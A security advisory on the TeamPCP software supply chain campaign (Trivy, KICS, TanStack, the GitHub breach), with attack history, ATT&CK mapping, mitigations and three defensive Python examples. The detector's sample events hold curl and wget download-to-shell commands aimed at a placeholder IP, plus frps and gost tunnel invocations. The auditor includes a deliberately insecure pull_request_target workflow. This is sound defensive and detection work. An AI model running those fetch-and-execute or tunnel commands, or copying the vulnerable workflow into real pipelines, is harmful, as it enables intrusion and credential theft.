[CS-SA-26-0701] TeamPCP Software Supply Chain Campaigns

CRITICALSTART® Cyber Research Unit (CRU)
July 3, 2026

CRITICALSTART® Security Advisory

TLP:CLEAR

Executive Summary

On July 2, 2026, the Federal Bureau of Investigation (FBI) released a FLASH report on TeamPCP tactics, techniques, procedures (TTPs), and indicators of compromise (IOCs), reflecting sustained federal law enforcement attention to the group's activity.[1] This advisory incorporates that report alongside findings from 16 additional independent industry, government, and press sources into a single consolidated analysis for security teams and leadership.

The CRITICALSTART® Cyber Research Unit (CRU) is tracking TeamPCP, a financially motivated threat actor conducting a sustained campaign of software supply chain compromises across widely used developer and security tools. The campaign began with the compromise of Aqua Security Trivy in March 2026 and has since expanded to Checkmarx KICS, LiteLLM, the Telnyx Python software development kit (SDK), and several additional packages across the GitHub Actions, npm, PyPI, Docker Hub, and OpenVSX ecosystems.[1, 2]

TeamPCP gains initial access primarily through compromised continuous integration and continuous delivery (CI/CD) credentials and misconfigured GitHub Actions triggers, then leverages stolen tokens to poison additional packages in a self-perpetuating cycle. Confirmed impact includes theft of cloud access tokens, Secure Shell (SSH) keys, and Kubernetes secrets from affected environments.[1] Independent research places the campaign's scale at over 1,000 affected software-as-a-service (SaaS) environments, approximately 500,000 stolen credentials, and more than 300 gigabytes (GB) of exfiltrated data, spanning at least 20 distinct attack waves through May 2026.[6, 9, 14] The campaign escalated further in May 2026 with a self-propagating worm known as Mini Shai-Hulud, which compromised the TanStack ecosystem and more than 170 additional npm and PyPI packages, and culminated in TeamPCP's claimed and subsequently confirmed breach of GitHub's own internal source code repositories.[11, 12, 15, 16] Organizations that use any of the affected packages, or that rely on GitHub Actions workflows with the pull_request_target trigger, should treat this as an active and ongoing threat rather than a closed incident.[3] Critical Start recommends immediate credential rotation, GitHub Actions hardening, and the detection and response actions outlined in this advisory.

Background

TeamPCP is a financially motivated threat actor, also tracked under the aliases PCPcat, ShellForce, DeadCatx3, and CipherForce.[1, 3] The group first surfaced in late 2025 conducting cloud-native exploitation against exposed Docker application programming interfaces (APIs) and Kubernetes clusters, with earlier roots in cryptocurrency mining and theft, before pivoting toward large-scale software supply chain compromise.[3]

The most impactful technique in TeamPCP's toolkit abuses GitHub Actions configurations within victim CI/CD pipelines.[3] Specifically, the group has repeatedly exploited weaknesses associated with the pull_request_target trigger, a GitHub Actions feature that allows workflows triggered by a pull request from a fork to run with the permissions and secrets of the original repository rather than the fork. Security researchers refer to abuse of this trigger as a "Pwn Request," a term GitHub itself has warned about in security advisories issued in 2021 and again in 2025.[3]

The current wave of the campaign began on March 19, 2026, when TeamPCP compromised the aqua-bot service account associated with Aqua Security's Trivy vulnerability scanner and executed an imposter commit attack, force-pushing malicious code to 76 of 77 version tags in the aquasecurity/trivy-action repository and to all tags in aquasecurity/setup-trivy.[2] This initial compromise was made possible by an incomplete credential rotation following a smaller breach disclosed in late February 2026, illustrating how partial remediation of an earlier incident enabled a far larger follow-on compromise.[2] Two days later, on March 21, 2026, TeamPCP used stolen GitHub personal access tokens (PATs) harvested from the Trivy compromise to target Checkmarx KICS, an infrastructure-as-code (IaC) scanner, force-pushing malicious commits to 35 version tags of the checkmarx/kics-github-action repository.[2] This pattern — using credentials stolen from one compromised tool to poison the next — is the defining operational signature of the campaign and is consistent with the FBI's assessment that exfiltrated data and credentials should be treated as a persistent, long-term risk rather than a one-time exposure event.[1, 2]

In May 2026, TeamPCP claimed to have breached GitHub's own internal source code repositories, reportedly accessing several thousand repositories after a GitHub employee installed a poisoned Visual Studio Code extension. GitHub confirmed the compromise and stated that the exposed material consisted of GitHub's own internal code rather than customer data.[4, 15, 16] Independent reporting on the incident places it within the broader arc of TeamPCP's campaign, in which each compromised environment has repeatedly yielded the credentials needed to reach the next target.[4]

Threat Actor Network

TeamPCP operates a public-facing presence on Telegram across two channels, which grew from roughly 700 subscribers in early February 2026 to over 1,180 by late March, driven largely by media coverage of the group's supply chain operations.[6] The group does not appear to operate as a standalone actor. On BreachForums, TeamPCP formally announced a partnership with the Vect Ransomware Group, an emerging ransomware-as-a-service operation offering affiliates an 80% to 88% profit share, under which Vect deploys ransomware against organizations already compromised through TeamPCP's supply chain intrusions.[6] TeamPCP simultaneously runs CipherForce as a parallel ransomware operation, creating a dual-track extortion model, and a Lapsus$ collaboration has been reported but is not independently confirmed.[6]

Attribution across the campaign's many waves is assessed with medium-high confidence. Trend Micro tracks the activity cluster internally as SHADOW-WATER-058 and bases attribution on consistent infrastructure, tooling, and operational markers observed across waves, including a shared cipher seed embedded in the LiteLLM, Xinference, and elementary-data payloads.[7] A self-identification by the group, posted to social media following the Checkmarx KICS incident, aligned with the cluster name researchers were already using internally.[7] TeamPCP should not be conflated with every open-source supply chain incident reported in 2026. Independent researchers have specifically distinguished TeamPCP from the unrelated GhostClaw campaign, which uses different infrastructure and npm typosquatting rather than CI/CD credential theft, and have confirmed that at least one unrelated source code disclosure was caused by an accidental build error rather than TeamPCP activity. Analysts should verify attribution against the indicators in this advisory before assuming a given incident is TeamPCP's work.

Attack Methodology and Techniques

TeamPCP's operational approach combines credential harvesting, sophisticated command and control infrastructure, and modular malware families to achieve lateral movement across victim environments. The group's tactics evolved from direct repository poisoning to advanced supply chain attacks that leverage CI/CD pipelines, container infrastructure, and self-propagating worms. The following subsections provide details.

Credential Theft and Force-Push Compromise

TeamPCP's payloads are designed to harvest the broadest possible range of developer and cloud secrets, including cloud access tokens, Secure Shell (SSH) keys, Kubernetes secrets, package registry publishing tokens, and Git credentials.[1] Early payload variants extracted Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure credentials directly from a compromised endpoint's instance metadata service.[2] Later variants evolved into a modular loader architecture that pulled second-stage payloads on demand, and ultimately into a self-replicating worm with wiper components capable of scanning for exposed Docker APIs and harvesting SSH keys across a local subnet.[2]

Command and Control Infrastructure

TeamPCP has used both traditional and decentralized command and control (C2) infrastructure. One wave relied on the typosquat domain checkmarx[.]zone for exfiltration, while other waves adopted an Internet Computer Protocol (ICP) blockchain canister as a censorship-resistant dead-drop, an approach that removes any single point of takedown for defenders.[2] As a fallback exfiltration channel, the malware has used a victim's own GitHub token to create a hidden repository (commonly named docs-tpcp or tpcp-docs) within the victim's own GitHub organization, allowing data theft to blend into ordinary repository activity.[1, 2]

Malware Deployed by TeamPCP

  • CanisterWorm: harvests cloud access tokens, credentials, application programming interface (API) keys, and other authentication material tied to AWS, GCP, and Azure, and includes wiper components for destructive follow-on activity.[1, 2]
  • SANDCLOCK: a credential-stealing tool that extracts AWS credentials, Kubernetes ServiceAccount tokens, local environment variables, and cryptocurrency wallet data.[1]
  • Mini Shai-Hulud: a self-replicating, cross-ecosystem worm that propagates across npm and PyPI by publishing infected package versions using stolen publishing tokens.[1]
  • Miasma: a Mini Shai-Hulud variant that self-propagates across open-source registries, harvesting credentials and poisoning configuration files.[1]

TeamPCP has also engaged in extortion and reported collaboration with other cybercriminal groups, including publishing victim names on a public leak site and threatening the disclosure of stolen data.[1]

Container and Cloud Lateral Movement

Beyond direct package poisoning, TeamPCP conducts container and Kubernetes compromise using a familiar but effective pattern: downloading and immediately executing a script through a shell pipeline to gain execution while avoiding file creation on disk.[8] Once stable execution is achieved, the actor deploys tunneling and proxy tooling, including frps and gost, to expose internal services and convert compromised containers into reusable infrastructure for pivoting into other environments.[8] TeamPCP has also been observed exploiting the React2Shell vulnerability directly against exposed web servers to gain shell access outside of containerized workloads, expanding the attack surface beyond Kubernetes and CI/CD environments alone.[8]
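The container pattern described above (a download piped straight into a shell, followed by frps or gost appearing inside the workload) is the kind of behaviour a runtime detection rule can catch. The following is an added example written for this advisory, not code from Critical Start, Elastic, or any referenced source: it runs two simple rules over a handful of constructed process-execution events in the shape an auditd or eBPF exec feed would produce. The command lines, PIDs, and 198.51.100.x addresses are invented for the example.

```python
import re
import shlex
from typing import Dict, List

# Constructed sample of process-execution events, in the shape a defender might
# get from an auditd or eBPF exec feed. The IPs use the 198.51.100.0/24
# documentation range; none of these lines come from the advisory or a real host.
SAMPLE_EVENTS = [
    {"pid": 4101, "cmdline": "sh -c 'curl -fsSL http://198.51.100.7/s.sh | sh'"},
    {"pid": 4102, "cmdline": "bash -c 'wget -qO- http://198.51.100.7/i.sh | bash'"},
    {"pid": 4103, "cmdline": "/tmp/.x/frps -c /tmp/.x/frps.toml"},
    {"pid": 4104, "cmdline": "./gost -L=:8080 -F=socks5://198.51.100.7:1080"},
    {"pid": 4105, "cmdline": "curl -fsSL https://example.invalid/app.tgz -o /tmp/app.tgz"},
    {"pid": 4106, "cmdline": "sh -c 'curl -fsSL https://example.invalid/app.tgz | sha256sum'"},
]

# A downloader (curl/wget) whose output is piped straight into a shell. The
# character class stops at '|', ';' and '&' so the pipe matched is the one that
# immediately follows the download; the '\b' after 'sh' keeps 'sha256sum' and
# similar benign consumers from matching.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:/usr/bin/|/bin/)?(?:ba|da|z)?sh\b"
)

# Tunneling/proxy binaries the advisory reports TeamPCP deploying in containers.
TUNNEL_TOOLS = {"frps", "gost"}


def detect(event: Dict[str, object]) -> List[str]:
    """Return the names of the rules this single exec event triggers."""
    cmdline = str(event.get("cmdline", ""))
    hits: List[str] = []

    if PIPE_TO_SHELL.search(cmdline):
        hits.append("pipe_to_shell")

    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: fall back to a naive split
        argv = cmdline.split()
    # Match on the executable's basename so a relocated copy (/tmp/.x/frps) still hits.
    if argv and argv[0].rsplit("/", 1)[-1] in TUNNEL_TOOLS:
        hits.append("tunnel_tool")

    return hits


def scan(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Run every rule over a batch of events and keep only those that alert."""
    alerts = []
    for event in events:
        rules = detect(event)
        if rules:
            alerts.append({"pid": event["pid"], "rules": rules, "cmdline": event["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"pid={alert['pid']} rules={','.join(alert['rules'])} :: {alert['cmdline']}")
```

Matching on the executable's basename rather than its full path is deliberate: the tooling is typically dropped under a throwaway directory, so a path-based rule would miss it. In a real deployment the two rules would be combined with process ancestry (a shell spawned by a container runtime or a CI runner) to reduce noise from legitimate installers that also use pipe-to-shell.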

The Mini Shai-Hulud Worm and the May 2026 GitHub Breach

Worm Mechanics and Provenance Abuse

On May 11, 2026, TeamPCP introduced a new self-propagating payload under the name Mini Shai-Hulud. For this wave, the actor exploited a pull request workflow misconfiguration in the TanStack open-source project's GitHub Actions continuous integration (CI) pipeline: a pull request from a fork triggered a workflow with write access to the base repository's build cache, and the poisoned cache was executed roughly eight hours later when a legitimate maintainer merge triggered the standard release workflow.[11] The worm then scraped an OpenID Connect (OIDC) token directly from the GitHub Actions runner's memory and exchanged it for npm publishing credentials through npm's own token exchange endpoint, meaning no token was "stolen" in the traditional sense and the publish workflow itself did not appear compromised.[11]

This mechanism allowed the resulting malicious packages to carry valid Supply-chain Levels for Software Artifacts (SLSA) Build Level 3 provenance attestations, making this the first documented npm worm confirmed to produce validly attested malicious packages.[12] SLSA provenance confirms which pipeline produced an artifact, not whether that pipeline behaved as intended, and a compromised build step can therefore still produce an artifact that passes standard provenance verification.[12] The wave ultimately affected more than 170 packages across the TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI namespaces, and the worm's marker repositories, commit branch names, and encryption artifacts consistently referenced Frank Herbert's Dune novels.[12]
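To make the SLSA limitation above concrete, here is an added example (written for this advisory, not taken from TanStack, npm, or any referenced source) of the policy check a consumer can layer on top of provenance verification. It assumes an in-toto Statement with a SLSA v1 provenance predicate laid out the way GitHub-generated npm provenance is (builder id, workflow repository, ref, and path); the package name, organization, digests, and run id are invented placeholders. The check enforces which pipeline is allowed to have built the package, and rejects a statement that names a fork and a pull-request ref. It would still accept a poisoned-cache build from the genuine release workflow, which is exactly the gap the paragraph describes.

```python
import copy
import re
from typing import Dict

# Constructed in-toto Statement carrying a SLSA v1 provenance predicate. Every
# value is invented for this example; nothing here is a real attestation.
SAMPLE_STATEMENT = {
    "_type": "https://in-toto.io/Statement/v1",
    "subject": [{"name": "pkg:npm/%40example-org/router@1.2.3",
                 "digest": {"sha512": "00" * 64}}],
    "predicateType": "https://slsa.dev/provenance/v1",
    "predicate": {
        "buildDefinition": {
            "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
            "externalParameters": {
                "workflow": {
                    "ref": "refs/tags/v1.2.3",
                    "repository": "https://github.com/example-org/router",
                    "path": ".github/workflows/release.yml",
                }
            },
            "resolvedDependencies": [{
                "uri": "git+https://github.com/example-org/router@refs/tags/v1.2.3",
                "digest": {"gitCommit": "a" * 40},
            }],
        },
        "runDetails": {
            "builder": {"id": "https://github.com/actions/runner/github-hosted"},
            "metadata": {"invocationId":
                         "https://github.com/example-org/router/actions/runs/1/attempts/1"},
        },
    },
}

# The consumer's policy: which pipeline is allowed to produce this package.
POLICY = {
    "builder_id": "https://github.com/actions/runner/github-hosted",
    "repository": "https://github.com/example-org/router",
    "workflow_path": ".github/workflows/release.yml",
    "ref_pattern": r"^refs/tags/v\d+\.\d+\.\d+$",   # releases come from version tags only
}


def check_provenance(statement: dict, policy: dict) -> Dict[str, str]:
    """Compare a provenance statement against policy.

    Returns a mapping of violated policy field -> explanation; an empty dict
    means the artifact's pipeline identity matches policy. Signature
    verification of the envelope (e.g. with a Sigstore client) is assumed to
    have happened before this function is called.
    """
    problems: Dict[str, str] = {}
    if statement.get("predicateType") != "https://slsa.dev/provenance/v1":
        problems["predicateType"] = f"unexpected {statement.get('predicateType')!r}"
        return problems

    pred = statement["predicate"]
    workflow = pred["buildDefinition"]["externalParameters"].get("workflow", {})
    builder_id = pred["runDetails"]["builder"].get("id", "")

    if builder_id != policy["builder_id"]:
        problems["builder_id"] = f"built by {builder_id!r}"
    if workflow.get("repository") != policy["repository"]:
        problems["repository"] = f"built from {workflow.get('repository')!r}"
    if workflow.get("path") != policy["workflow_path"]:
        problems["workflow_path"] = f"built by workflow {workflow.get('path')!r}"
    if not re.match(policy["ref_pattern"], workflow.get("ref", "")):
        problems["ref"] = f"built from ref {workflow.get('ref')!r}, not a release tag"
    return problems


# A second constructed statement: same package, but attested as built by a
# fork's pull-request ref. It is well-formed provenance, yet it names the wrong
# pipeline, so the policy rejects it.
FORK_STATEMENT = copy.deepcopy(SAMPLE_STATEMENT)
FORK_STATEMENT["predicate"]["buildDefinition"]["externalParameters"]["workflow"].update({
    "repository": "https://github.com/someone-else/router",
    "ref": "refs/pull/42/merge",
})

if __name__ == "__main__":
    print("release build:", check_provenance(SAMPLE_STATEMENT, POLICY) or "accepted")
    print("fork build:   ", check_provenance(FORK_STATEMENT, POLICY))
```

The design point is that provenance answers "who built this, from where, with which workflow"; the policy above turns those answers into a decision. What it cannot express is whether the release workflow's own inputs (here, a build cache) were clean, which is why the mitigation list treats provenance verification as one layer rather than a sufficient control.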

On May 12, 2026, TeamPCP publicly released what independent analysis confirmed to be the complete source code of the Shai-Hulud offensive framework on GitHub, with a README crediting the group directly.[13] The released framework is a modular toolkit for credential harvesting, supply chain poisoning, and encrypted data exfiltration, and its public availability means the same techniques can now be studied, adapted, and reused by other threat actors beyond TeamPCP.[13] Researchers have noted that the compromised TanStack packages alone, such as @tanstack/react-router, represent load-bearing infrastructure consumed directly and transitively across large portions of the JavaScript ecosystem.[14]

The GitHub Internal Breach

One of the credentials harvested during the May Mini Shai-Hulud wave belonged to a TanStack contributor whose access chained through to publishing credentials for the Nx Console Visual Studio Code extension. TeamPCP used this access to poison the extension, and a GitHub employee who installed the compromised version had their device compromised as a result.[15, 16] GitHub subsequently confirmed that the resulting activity involved exfiltration of GitHub-internal repositories, stating that the attacker's claim of approximately 3,800 repositories was directionally consistent with its own investigation, and that the exposed material consisted of GitHub's own code rather than customer data.[15, 16]

TeamPCP subsequently advertised GitHub's source code and internal organizations for sale on BreachForums for an asking price of no less than $50,000, and later announced a joint sale of the same material with the Lapsus$ group for $95,000, stating that the data would be leaked for free if no buyer emerged.[15] This incident illustrates that TeamPCP's downstream risk is not limited to organizations that directly consume the packages it has poisoned; a compromised developer tool anywhere in the supply chain, including code editor extensions, can provide a path into an upstream platform provider itself.

MITRE ATT&CK Technique Mapping

The following table maps TeamPCP's observed tactics and techniques to the MITRE ATT&CK framework, enabling security teams to correlate the group's activity with detection rules, threat models, and response procedures already in use across their infrastructure.

Technique ID | Name | Description
T1195.001 | Compromise Software Dependencies and Development Tools | TeamPCP force-pushed malicious commits to trusted repositories including Trivy, KICS, LiteLLM, and Telnyx, poisoning downstream software before it reached victim environments.
T1078 | Valid Accounts | Initial access to Trivy and KICS was achieved using a compromised service account (aqua-bot) and stolen GitHub personal access tokens rather than exploitation of a software flaw.
T1552 | Unsecured Credentials | Malware harvested cloud access tokens, SSH keys, Kubernetes secrets, and environment variables directly from CI/CD runners and compromised endpoints.
T1567 | Exfiltration Over Web Service | Stolen data was exfiltrated to typosquat domains, decentralized ICP canister infrastructure, and hidden repositories created within victim GitHub organizations.
T1485 | Data Destruction | CanisterWorm incorporates wiper components alongside its credential-harvesting functionality.
T1090 | Proxy | Tunneling tools frps and gost were deployed inside compromised containers to expose internal services and pivot into additional environments.
T1027 | Obfuscated Files or Information | Mini Shai-Hulud payloads such as router_init.js were obfuscated to profile the execution environment before launching credential-stealing functionality.

Vulnerability Context

The FBI FLASH report lists four CVE identifiers associated with the TeamPCP campaign.[1] CVE-2025-55182, also known as React2Shell, is not itself a supply chain flaw but is included because TeamPCP's predecessor operations used it for initial cloud access before the group pivoted to supply chain compromise.

CVE | CVSS | Relevance
CVE-2026-33634 | 8.8 | Embedded malicious code in Aqua Security Trivy, delivered via a compromised service account and force-pushed version tags.
CVE-2026-45321 | 9.6 | Supply chain compromise of TanStack npm packages via the Mini Shai-Hulud worm, using hijacked GitHub Actions OpenID Connect (OIDC) tokens.
CVE-2026-48027 | 9.8 | Associated with a downstream package compromise linked to the broader TeamPCP campaign per FBI reporting.
CVE-2025-55182 | 10.0 | React2Shell, an unauthenticated remote code execution flaw in React Server Components, exploited during TeamPCP's earlier cloud exploitation operations.

Implications for Organizations

Any organization that has installed an affected version of Trivy, KICS, LiteLLM, the Telnyx SDK, or a downstream package during the exposure windows described in this advisory should assume that any secret accessible to the affected CI/CD pipeline has been exposed. Because TeamPCP's model depends on chaining stolen credentials from one compromise into the next, a single unrotated token can allow the actor to regain access even after the initially affected package has been patched or removed.[1, 2]

The exploitation of the pull_request_target trigger means that organizations maintaining open-source projects, or consuming packages that do so, carry risk that extends beyond their own direct dependencies. Long-lived, broadly scoped GitHub Actions tokens are the single largest amplifying factor in the campaign's reach.[3]

The May 2026 GitHub breach demonstrates that this risk extends to platform providers themselves: a single compromised code editor extension on one employee device led to the exfiltration of thousands of internal repositories.[15, 16] Organizations should also account for downstream monetization risk. TeamPCP's confirmed partnership with the Vect ransomware group means that credentials and access harvested during a supply chain compromise may resurface weeks or months later as a ransomware intrusion rather than remaining a pure credential theft event.[6] Removing or patching an affected package does not remediate this campaign on its own. Credentials accessible to the compromised pipeline during the exposure window must be rotated, or the actor can regain access through previously stolen tokens.

Prioritized Mitigation Strategies

To improve your organization's security posture in light of the TeamPCP threat, we recommend the following:

Immediate (Within 24 Hours)

  • Rotate all CI/CD secrets, publishing tokens, and cloud credentials accessible to pipelines during the exposure windows in this advisory.
  • Search GitHub organization repositories for tpcp-docs or docs-tpcp repositories, which indicate exfiltration.
  • Pin all GitHub Actions workflows to verified commit SHA hashes rather than floating tags or branches.
  • Audit developer workstations for the Nx Console Visual Studio Code extension and other IDE extensions installed outside centrally managed channels.

Short-Term (Within Two Weeks)

  • Require phishing-resistant MFA (passkeys or hardware keys) for all accounts with code repository or package publishing access.
  • Remove the pull_request_target trigger from GitHub Actions workflows unless strictly required.
  • Deploy runtime monitoring for CI/CD pipelines to detect unexpected outbound connections and tunneling tools (frps, gost).
  • Audit npm and PyPI package maintainer recovery email addresses for stale or expired domains.
  • Require code review approvals and signed commits before merging to protected branches.[3]
  • Adopt Sigstore-aware provenance verification rather than relying on SLSA attestation alone.[12]
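Three of the items above (searching for tpcp-docs or docs-tpcp repositories, pinning actions to commit SHAs, and removing pull_request_target) can be checked mechanically. The following is an added example written for this advisory, not code from Critical Start, GitHub, or any referenced source. It audits workflow files with plain regular expressions rather than a YAML parser, so it needs no third-party library, and it checks organization repository records in the shape returned by GitHub's list-organization-repositories API (only the name, full_name, and private fields are used). Both workflow texts, the repository records, and the 40-hex SHA in the hardened workflow are constructed placeholders.

```python
import re
from typing import Dict, List

# Two constructed GitHub Actions workflows: a risky one and its hardened
# counterpart. Neither is taken from the advisory or from any real project.
RISKY_WORKFLOW = """\
name: pr-checks
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm test
"""

HARDENED_WORKFLOW = """\
name: pr-checks
on:
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      # The 40-hex SHA below is a placeholder; pin to the commit you verified.
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # v4.x
      - run: npm ci && npm test
"""

USES_LINE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^@\s'\"]+)@([^\s'\"#]+)", re.M)
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")
PR_HEAD = re.compile(r"github\.event\.pull_request\.head\.(?:sha|ref)")
PRT_TRIGGER = re.compile(r"\bpull_request_target\b")


def audit_workflow(text: str) -> List[str]:
    """Return human-readable findings for one workflow file's text."""
    findings: List[str] = []
    # Any mention of the trigger is flagged. A guard such as
    # `if: github.event_name == 'pull_request_target'` also matches, which is
    # the conservative choice for an audit.
    if PRT_TRIGGER.search(text):
        findings.append("pull_request_target trigger present")
        if PR_HEAD.search(text):
            findings.append("pull_request_target workflow checks out the pull-request head "
                            "(untrusted code runs with base-repository secrets)")
    for action, ref in USES_LINE.findall(text):
        if action.startswith("./") or action.startswith("docker://"):
            continue  # local actions and container images are pinned by other means
        if not FULL_SHA.match(ref):
            findings.append(f"unpinned action: {action}@{ref}")
    return findings


# Repository names the advisory reports the malware creating inside a victim's
# own GitHub organization as a fallback exfiltration channel.
EXFIL_REPO_NAMES = {"docs-tpcp", "tpcp-docs"}

# Constructed records in the shape of GitHub's list-organization-repositories
# API response (only the fields used here).
SAMPLE_ORG_REPOS = [
    {"name": "website", "full_name": "example-org/website", "private": False},
    {"name": "docs-tpcp", "full_name": "example-org/docs-tpcp", "private": True},
    {"name": "infra", "full_name": "example-org/infra", "private": True},
]


def find_exfil_repos(repos: List[Dict[str, object]]) -> List[str]:
    """Return full names of repositories matching the known exfiltration names."""
    return [str(r["full_name"]) for r in repos
            if str(r["name"]).lower() in EXFIL_REPO_NAMES]


if __name__ == "__main__":
    for label, wf in (("risky", RISKY_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"{label}: {audit_workflow(wf) or ['no findings']}")
    print("possible exfiltration repos:", find_exfil_repos(SAMPLE_ORG_REPOS))
```

Run the audit over every file under .github/workflows in each repository and treat any finding on a repository that also holds publishing secrets as a priority. The repository-name check is only as good as the inventory fed to it; a repository the actor created and later deleted will not appear, so the organization's audit log should be reviewed for repository creation events over the same window.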

What Critical Start is Doing

The CRITICALSTART® Cyber Research Unit (CRU) continues to monitor and report on TeamPCP and related threat activity while working closely with the Security Operations Center (SOC) and Security Engineering team to implement relevant detections and increase vigilance. CRU will post future updates via Cyber Operations Risk & Response™ Bulletins and on the CRITICALSTART® Intelligence Hub.

Conclusion

TeamPCP has demonstrated a sustained ability to convert compromised developer and security tooling into a self-perpetuating credential theft operation, a pattern confirmed independently by federal law enforcement, industry researchers, and press investigation.[1, 2, 6, 15] The group's operational model, which relies on using stolen credentials from one compromised tool to poison the next, means that patching a single affected package does not close the exposure; the actor can regain access through previously exfiltrated tokens weeks or months after initial discovery. This pattern, combined with TeamPCP's confirmed partnership with ransomware operators and its demonstrated capability to reach platform providers themselves via compromised developer tooling, establishes a risk profile that extends far beyond the tools currently public.[6, 15, 16]

Organizations that use any affected package, or that maintain GitHub Actions workflows with the pull_request_target trigger, should rotate credentials and apply the recommendations in this advisory without delay. More broadly, the security engineering and DevOps teams responsible for open-source consumption and CI/CD pipeline management should treat this campaign as a sustained, ongoing threat and adjust their supply chain risk models accordingly. Defenders should remain vigilant for any attempt to exploit similar credential chains, whether in their direct dependencies or several layers removed, and should maintain liaison relationships with law enforcement and peer security teams to ensure rapid dissemination of new indicators as the campaign evolves.

Further Reading

  [1] Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency, "Cyber Criminal Group TeamPCP," FLASH-20260702-01, Jul. 2, 2026. [Online]. Available: https://www.ic3.gov/CSA/2026/260702.pdf
  [2] Palo Alto Networks Unit 42, "Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure," Apr. 9, 2026. [Online]. Available: https://unit42.paloaltonetworks.com/teampcp-supply-chain-attacks/
  [3] Okta Threat Intelligence, "Defending against TeamPCP software supply chain attacks," May 18, 2026. [Online]. Available: https://www.okta.com/ko-kr/blog/threatintelligence/defending_against_team_pcp_software_supply_chain_attacks/
  [4] WIRED, "TeamPCP's Software Supply Chain Attack Spree on GitHub," May 2026. [Online]. Available: https://www.wired.com/story/teampcp-software-supply-chain-attack-spree-github/
  [5] Malpedia, "TeamPCP (Threat Actor)," Fraunhofer FKIE, May 22, 2026. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/teampcp
  [6] SOCRadar, "Dark Web Profile: TeamPCP," Apr. 9, 2026. [Online]. Available: https://socradar.io/blog/dark-web-profile-teampcp/
  [7] Trend Micro, "Analyzing TeamPCP's Supply Chain Attacks: Checkmarx KICS and elementary-data in CI/CD Credential Theft," May 13, 2026. [Online]. Available: https://www.trendmicro.com/en_us/research/26/e/analyzing-teampcp-supply-chain-attacks.html
  [8] Elastic Security Labs, "Linux & Cloud Detection Engineering: TeamPCP Container Attack Scenario," Mar. 20, 2026. [Online]. Available: https://www.elastic.co/security-labs/teampcp-container-attack-scenario
  [9] Wiz, "The Worm That Keeps on Digging: TeamPCP Hits @antv in Latest Wave," May 19, 2026. [Online]. Available: https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain
  [10] Endor Labs, "TeamPCP Isn't Done: Threat Actor Behind Trivy and KICS Compromises Now Hits LiteLLM's 95 Million Monthly Downloads on PyPI," Mar. 30, 2026. [Online]. Available: https://www.endorlabs.com/learn/teampcp-isnt-done
  [11] Akamai, "Mini Shai-Hulud: The Worm Returns and Goes Public," May 15, 2026. [Online]. Available: https://www.akamai.com/blog/security-research/mini-shai-hulud-worm-returns-goes-public
  [12] StepSecurity, "TeamPCP's Mini Shai-Hulud Is Back: A Self-Spreading Supply Chain Attack Compromises TanStack npm Packages," May 10, 2026. [Online]. Available: https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem
  [13] Datadog Security Labs, "Shai-Hulud Goes Open Source," May 13, 2026. [Online]. Available: https://securitylabs.datadoghq.com/articles/shai-hulud-open-source-framework-static-analysis/
  [14] ReversingLabs, "Team PCP's Mini Shai-Hulud Tears at Open-Source Trust," May 19, 2026. [Online]. Available: https://www.reversinglabs.com/blog/mini-shai-hulud-tears-at-oss-trust
  [15] The Hacker News, "GitHub Breached: Employee Device Hack Led to Exfiltration of 3,800+ Internal Repos," May 20, 2026. [Online]. Available: https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html
  [16] Help Net Security, "TeamPCP Breached GitHub's Internal Codebase via Poisoned VS Code Extension," May 21, 2026. [Online]. Available: https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/
  [17] ramimac.me, "Incident Timeline: TeamPCP Supply Chain Campaign," Mar. 19, 2026 (continually updated). [Online]. Available: https://ramimac.me/teampcp/